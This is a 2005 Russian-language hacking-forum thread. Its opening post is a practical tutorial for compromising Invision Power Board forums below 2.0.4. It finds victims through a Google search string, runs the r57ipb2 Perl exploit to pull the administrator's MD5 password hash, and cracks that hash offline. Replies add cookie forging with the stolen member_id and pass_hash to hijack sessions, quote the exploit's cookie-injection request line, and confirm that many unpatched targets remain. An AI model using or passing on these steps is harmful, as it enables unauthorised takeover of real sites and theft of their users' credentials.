Форумы Взлом форумов IPB (Invision Power Board) < 2.0.4

Discussion in 'Уязвимости CMS/форумов' started by Ice_Fro$T, 9 Nov 2005.

  1. Ice_Fro$T

    Ice_Fro$T New Member

    Joined:
    31 Oct 2005
    Messages:
    10
    Likes Received:
    3
    Reputations:
    -1
    Взлом форумов IPB (Invision Power Board) < 2.0.4
    Делать мы это будем при помощи эксплоита.
    Итак что нам понадобится:
    -Голова
    -Руки. Растущие из правильного (с анатомической точки зрения) места.
    -Active Perl
    -Сплоит
    -MD5 INSIDE (для расшифровки хешей)

    Итак приступим.
    1)Качаем Active Perl
    Устанавливаем к примеру в c:\perl
    Создаем папку c:\perl\sploits -Место где будут лежать сплоиты

    2)Далее качаем сплоит.
    Он называется:
    r57ipb2
    Лежит тут:
    http://rst.void.ru/download/r57ipb2.txt
    Сохраняем в с:\perl\sploits\
    Идем в с:\perl\sploits\ и переименовываем
    r57ipb2.txt
    в
    r57ipb2.pl
    Правим сплоит.( Там одна ошибка стоит только присмотреться и сразу бросится в глаза.)
    3)Ищем жертву.
    Google в помощь.
    (Для тех кто в танке: набираем в поле поиска - Powered by Invision Power Board)

    4)Идем в командную строку и набираем что-то вроде:
    perl c:\perl\splots\r57ipb2.pl www.target.com /directory/ 1 X
    Итак разбираем что я только что написал:
    [+]perl - Запускаем Active Perl;
    [+]c:\perl\splots\r57ipb2.pl - пусть к сплоиту;
    [+]www.target.com - Цель;
    [+]/dir/ - Директория, где хранится форум.Пример: /forum/
    Примечание если форум находится в корневом каталоге, то вводим просто: /
    Пример:
    perl c:\perl\splots\r57ipb2.pl www.target.com / 1 X
    [+]1 - ID пользователя. (1 - ADMIN);
    [+]X - Вместо Х надо ввести 1 или 0
    1 - Если форум версии [2.0.0; 2.0.4)
    0 - Eсли форум версии < 2.0.0
    ========================================


    Должно получиться что-то вроде этого:
    ## r57ipb2.pl www.anyurl.com /forum/ 1 0
    ## [~] SERVER : www.target.com
    ## [~] PATH : /forum/
    ## [~] MEMBER ID : 1
    ## [~] TARGET : 0 - IPB 1.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
    =========================================
    5)Мы получили не сам пасс, а его хеш.
    Теперь из хеша получим пасс. Для этого нам нужна прога MD5INSIDE.
    Создаем текстовый док. Вставляем в него хеш. Заходим в MD5INSIDE.
    "Файл" >> "Открыть" находим наш док с хешом.
    "Поиск". Дальше как повезёт.

    6)Итак пасс получен.
     
    #1 Ice_Fro$T, 9 Nov 2005
    Last edited: 9 Nov 2005
    1 person likes this.
  2. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Так в Ipb 2.* хэширование же с солью...
     
  3. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    454
    Likes Received:
    212
    Reputations:
    168
    Зря ты подробный мануал выложил...
    Счас в сети не одного Ipb-форума не останется :)
     
  4. Bot_A_Nick

    Bot_A_Nick New Member

    Joined:
    27 Oct 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    В примере автор ломает ipb версии 1.x.x.

    А в ipb 2.x.x по крайней мере мы можем подделать кикисы...
    1) Заходим на форум регимся, и вбиваем логин с паролем...
    2) В опере заходим Сервис(Tolls)->Управление cookies(manage cookies)...
    3) Ищем папку с именем форума...
    4) Удаляем все параметры кроме:
    member_id
    pass_hash
    5) меняем оставшиеся параметры на полученные эксплоитом...
    6) Нажимаем "Обновить"

    ЗЫ Я знаю, что все это знают... просто вдруг кто-то незнает....
     
    #4 Bot_A_Nick, 9 Nov 2005
    Last edited: 9 Nov 2005
  5. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Нормальный мануал. Сплойт надо подправить, а хэш, полученный им, наврядли расшифруешь.
    Ну если что можно давать ссылку на этот топик тем кто спрашивает: как взломать форум?
    Последовательность действий понятна. Остальное.... тоже есть в инете. :)
     
  6. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Вроде видео по этому сплоиту есть...
     
  7. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    Мля! Чё за бред? Вы сначало попробуйте по запросу "Powered by Invision Power Board" найти не пропатченный форум=) Этот сплойт не вчера появился...
     
  8. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    ты это не гони, полно форумов не пропатченных осталось, крупных мало, но мелких до фига еще
     
  9. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    454
    Likes Received:
    212
    Reputations:
    168
    Тока люди сутки на пролет брутят хеши спионеренные...
     
  10. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    классный мануал !
     
  11. africanec

    africanec Banned

    Joined:
    11 Sep 2005
    Messages:
    222
    Likes Received:
    14
    Reputations:
    -3
    ага видео есть тока там еще добавленоо видео от coylа

    ето уже старо
    сейчас версии выше или пропатчены форумы ну конечно есть еще и уязвимые форумы
    но скорее всего они или неинтересны или на форуме по 10-30 чел зарегины(и форумы бесплатны)!
    ----------------------
    ну возможно твои пост комуто пригодиться
     
  12. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Зачем такой мануал ???

    ведь вреале видео есть и со сплойтом !

    и подробно всё описано !

    Автор поста видать тока проснулся :p
     
    _________________________
  13. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Это видео к 2.0.4 никакого отношения не имеет. Там это написано.
     
    #13 Azazel, 10 Nov 2005
    Last edited: 6 Mar 2006
  14. netadmin

    netadmin New Member

    Joined:
    28 Sep 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    -4
    a ktonebut znait kak ispravit strochku 134 ?
     
  15. stalles

    stalles Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    107
    Likes Received:
    19
    Reputations:
    -3
    видео есть, там всё подробно описано!!! нафиг по 100 раз создавать темы! даещё и старое!
     
  16. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    Вроде же киборг выкладывал подобное.
     
  17. CTTAPTAK

    CTTAPTAK Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    40
    Likes Received:
    2
    Reputations:
    3
    Чет не видал подобной кнопочки..
     
  18. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Если 8ая опера:
    инструменты - настройки - вкладка дополнительно - управление кукис.
     
  19. CTTAPTAK

    CTTAPTAK Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    40
    Likes Received:
    2
    Reputations:
    3
    Нашел. У меня седьмая )

    Для седьмой: файл- настройки-конфеденциальность- управление кукисами

    ----
    В сплойте пишет ошибку в строке :)

    Code:
     printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
    не подскажете в чем она?
     
  20. cheet

    cheet Banned

    Joined:
    22 Sep 2006
    Messages:
    70
    Likes Received:
    12
    Reputations:
    -8
    да в сети еще полно таких форумов сам около месяца назад просто проверить чотел и нашел не один десяток